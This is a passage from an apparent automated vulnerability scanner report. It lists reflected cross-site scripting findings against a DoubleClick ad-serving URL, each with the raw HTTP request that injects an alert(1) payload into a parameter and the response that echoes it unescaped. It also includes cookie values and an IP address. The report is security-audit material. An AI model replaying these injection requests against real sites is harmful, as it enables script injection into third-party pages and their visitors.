GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=9df1a'-alert(1)-'d8d0b082069&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54545

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
02562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=9df1a'-alert(1)-'d8d0b082069&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/http://www.blackberry.com">
...[SNIP]...

3.151. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [ppartner parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the ppartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1a9a7"-alert(1)-"ad0b1b525e8 was submitted in the ppartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=1a9a7"-alert(1)-"ad0b1b525e8&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:25 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54545

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
02562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=1a9a7"-alert(1)-"ad0b1b525e8&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/";
this.clickN = "0";
this.type = type;

...[SNIP]...

3.152. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [pt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b300"-alert(1)-"46531bd7138 was submitted in the pt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=83016b300"-alert(1)-"46531bd7138&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54548

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
50%3B41885690/41903477/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=83016b300"-alert(1)-"46531bd7138&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&
...[SNIP]...

3.153. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [pt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the pt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cfcb1'-alert(1)-'a9d20cd76d8 was submitted in the pt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301cfcb1'-alert(1)-'a9d20cd76d8&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:06 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54545

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
50%3B41885699/41903486/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301cfcb1'-alert(1)-'a9d20cd76d8&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&
...[SNIP]...

3.154. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [ra parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the ra request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0530"-alert(1)-"a006e1efd34 was submitted in the ra parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243d0530"-alert(1)-"a006e1efd34&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54545

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243d0530"-alert(1)-"a006e1efd34&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/";
this.clickN = "0";
this.type = type;
this.uniqueId = plcrInfo_1303848426617.uniqueId;

...[SNIP]...

3.155. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [ra parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the ra request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4c9c'-alert(1)-'3c148c4423f was submitted in the ra parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243a4c9c'-alert(1)-'3c148c4423f&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:35 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54545

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243a4c9c'-alert(1)-'3c148c4423f&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/http://www.blackberry.com">
...[SNIP]...

3.156. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [rqid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the rqid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 10e91'-alert(1)-'f91892f526a was submitted in the rqid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D710e91'-alert(1)-'f91892f526a&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54539

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D710e91'-alert(1)-'f91892f526a&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/http://www.blackberry.com">
...[SNIP]...

3.157. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [rqid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the rqid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bae93"-alert(1)-"c1a656bef97 was submitted in the rqid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7bae93"-alert(1)-"c1a656bef97&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:27 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54539

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7bae93"-alert(1)-"c1a656bef97&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/";
this.clickN = "0";

...[SNIP]...

3.158. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [sg parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the sg request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2aa53'-alert(1)-'20a1eda3f6c was submitted in the sg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=5025622aa53'-alert(1)-'20a1eda3f6c&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:16:27 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54548

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
t/click%3Bh%3Dv8/3af6/17/182/%2a/b%3B238347919%3B0-0%3B0%3B61499020%3B4307-300/250%3B41885690/41903477/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=5025622aa53'-alert(1)-'20a1eda3f6c&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom
...[SNIP]...

3.159. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [sg parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the sg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41489"-alert(1)-"2cc112ad18b was submitted in the sg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=50256241489"-alert(1)-"2cc112ad18b&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:16:23 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54548

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
t/click%3Bh%3Dv8/3af6/17/182/%2a/b%3B238347919%3B0-0%3B0%3B61499020%3B4307-300/250%3B41885690/41903477/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=50256241489"-alert(1)-"2cc112ad18b&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom
...[SNIP]...

3.160. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [site parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59eb9'-alert(1)-'a7fc128b15f was submitted in the site parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

